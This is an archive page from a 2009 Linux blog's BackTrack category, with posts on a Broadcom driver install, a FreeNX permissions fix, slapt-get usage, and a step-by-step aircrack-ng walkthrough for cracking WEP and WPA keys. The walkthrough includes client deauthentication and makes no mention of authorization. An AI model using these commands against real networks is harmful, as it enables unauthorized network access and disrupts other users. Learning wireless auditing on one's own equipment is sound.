Archive for the BackTrack Category

How to make the Broadcom 4312 Wireless driver work in BackTrack 4 on the Lenovo S10

Posted in BackTrack, Lenovo S10, Linux (Ubuntu) with tags , , , , , , , on September 25, 2009 by HydTech

This guide is adapted from Kazalku’s guide on remote exploit forums. Thanks Kazalku.

Download this driver and transfer it with a USB or boot up into another OS on your multiboot and save it in the BT root folder from here.

Untar it:

tar -xvzf hybrid-portsrc-x86_32-v5_10_91_9-3.tar.gz

makefile:
make -C /lib/modules/`uname -r`/build M=`pwd`

Insert the modules:
modprobe ieee80211_crypt_tkip
insmod wl.ko

Now you should have the network Claimed. you can check by:
lshw -C network

Bring it up:
ifconfig eth1 up

To load the module upon boot:

cp wl.ko /lib/modules/`uname -r`/kernel/net/wireless
depmod -a
modprobe wl

Load the module at every startup:
kate /etc/modules

add the following and close the text editor:
ieee80211_crypt_tkip
wl

Load NetworkManager and Configure KnetworkManager:
Type NetworkManager in a konsole and configure the wireless at the bottom right.

Delete the files you created in the root folder now that you dont need them.

Advertisements

Cracking WEP & WPA with IBM Lenovo X60 – Basics

Posted in BackTrack, fedora, Linux (Ubuntu), opensuse with tags , , , , , , , , , , on September 14, 2009 by HydTech

At first injection with the Intel pro wireless cards was impossible. Then came the ipwraw driver. Now, we no longer need the ipwraw as the iwl3945 card supports injection. Most linux distros now ship with this driver.

Follow these steps for a succesful WEP crack in Ubuntu:

download necessary files
sudo apt-get install aircrack-ng

place card in monitor mode
sudo airmon-ng start wlan0

test injection
sudo aireplay-ng -9 -e linksys -a 00:14:6C:7E:40:80 mon0
(0% means injection not working)

capture data and write to file called output
sudo airodump-ng -c 9 –bssid 00:14:6C:7E:40:80 -w output mon0

fake authentication
sudo aireplay-ng -1 0 -e linksys -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0

replay mode
sudo aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0

run aircrack
sudo aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap

For WPA cracking follow this:

monitor mode
sudo airmon-ng start wlan0

collect handshake
sudo airodump-ng -c 9 –bssid 00:14:6C:7E:40:80 -w psk mon0

deauth connected client
sudo aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

cracking
sudo aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

These are just refreshers. For more help check http://www.aircrack-ng.org

Freenx nx server problem in Ubuntu Jaunty 9.04

Posted in BackTrack, fedora, Linux (Ubuntu), opensuse on July 1, 2009 by HydTech

After upgrading to Jaunty, I never managed to successfully connect to my desktop using NX. I use a windows computer with nomachine nx client. I always got an error like this:

Info: Proxy running in client mode with pid '1728'
Session: Starting session at 'Sat Jan 12 16:34:05 2008'.
Warning: Connected to remote version 3.0.0 with local version 3.1.0
Info: Connection with remote proxy completed.
Warning: Unrecognized session type 'unix-desktop'. Assuming agent session.
Info: Using ADSL link parameters 512/24/1/0.
Info: Using cache parameters 4/4096KB/16384KB/16384KB.
Info: Using pack method 'adaptive-7' with session 'unix-gnome'.
Info: Using ZLIB data compression 1/1/32.
Info: Using ZLIB stream compression 4/4.
Info: No suitable cache file found.
Info: Forwarding X11 connections to display ':0'.
Info: Forwarding multimedia connections to port '6000'.
Info: Listening to font server connections on port '11000'.
Session: Session started at 'Sat Jan 12 16:58:19 2008'.
Info: Established X server connection.
Info: Using shared memory parameters 0/0K.
Session: Terminating session at 'Sat Jan 12 16:58:19 2008'.
Session: Session terminated at 'Sat Jan 12 16:58:19 2008'.

After hours of searching the web, I concluded the problem is with the ownership and permissions of the .Xauthority file. Here’s how I fixed it:
sudo chown hydtech /home/hydtech/.Xauthority
sudo chgrp hydtech /home/hydtech/.Xauthority

and delete:
sudo rm /home/hydtech/.Xauthority-l
sudo rm /home/hydtech/.Xauthority-c

Now it works like a charm.

How to Install packages with slapt-get or gslapt in BackTrack 3

Posted in BackTrack, Linux (Ubuntu) on April 21, 2009 by HydTech

Once BackTrack is installed on the harddrive, open the menu and goto K -> BackTrack -> Penetration -> Fast Track
type:
./fast-track.py -i
snapshot
Enter the Fast-Track updates menu (1).
Update everything (9).
snapshot1

After the update finishes, select the Installation menu (8).
Install everything (8).
Go back to the Installation menu, select Install Slapt-Get (1)
Install Slapt-Get (2), then select update SlackWare (1).
Exit (10)

Now, you can use slapt-get to install packages from the slackware repositories. For example, if you want to install mozilla-thunderbird:
Make sure it exists in the repositories:
slapt-get --search thunderbird
if you find it, use the install parameter to install:
slapt-get --install mozilla-thunderbird-2.0.0.21-i686-1

snapshot2

you can also use the gui front-end for slapt-get, but it is broken by default in BT3. so let’s reinstall it:
slapt-get --install --reinstall gslapt